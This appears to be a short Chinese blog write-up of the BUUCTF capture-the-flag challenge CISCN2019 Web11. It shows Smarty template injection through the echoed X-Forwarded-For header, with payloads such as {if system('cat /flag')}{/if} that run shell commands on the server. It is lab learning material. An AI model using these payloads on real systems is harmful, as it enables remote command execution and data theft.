GhostInMatrix

关注

BUUCTF:[CISCN2019 华东南赛区]Web11

GhostInMatrix

关注

阅读 73

2023-06-19


BUUCTF:[CISCN2019 华东南赛区]Web11_.net


BUUCTF:[CISCN2019 华东南赛区]Web11_CISCN2019_02


注意到了banner中信息说是smarty,并且将XFF输出到页面

BUUCTF:[CISCN2019 华东南赛区]Web11_.net_03

直接尝试Smarty模板注入

{$smarty.version}

BUUCTF:[CISCN2019 华东南赛区]Web11_.net_04

Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl

BUUCTF:[CISCN2019 华东南赛区]Web11_.net_05

{if system('ls -lha /')}{/if}

BUUCTF:[CISCN2019 华东南赛区]Web11_BUUCTF_06

{if system('cat /flag')}{/if}

BUUCTF:[CISCN2019 华东南赛区]Web11_BUUCTF_07


相关推荐

豆丁趣

[CISCN2019 华东南赛区]Double Secret flask的debug

豆丁趣 57 0 0

止止_8fc8

[CISCN2019 华北赛区 Day1 Web1]Dropbox

止止_8fc8 55 0 0

司马吹风

[CISCN2019 华北赛区 Day2 Web1]Hack World

司马吹风 63 0 0

月孛星君

[CISCN2019 华北赛区 Day1 Web1]Dropbox 1

月孛星君 11 0 0

把平平凡凡的生活过成诗与远方

BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)

把平平凡凡的生活过成诗与远方 34 0 0

花海书香

[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解

花海书香 7 0 0

phpworkerman

[BUUCTF] ciscn_2019_c_3

phpworkerman 60 0 0

转角一扇门

BUUCTF ciscn_2019_es_4

转角一扇门 34 0 0

星河出山

BUUCTF ciscn_2019_c_1(64位ret2libc3)

星河出山 76 0 0

猫er聆听没落的旋律

[CISCN 2019华北Day1]Web1

猫er聆听没落的旋律 31 0 0

精彩评论(0)

0 0 举报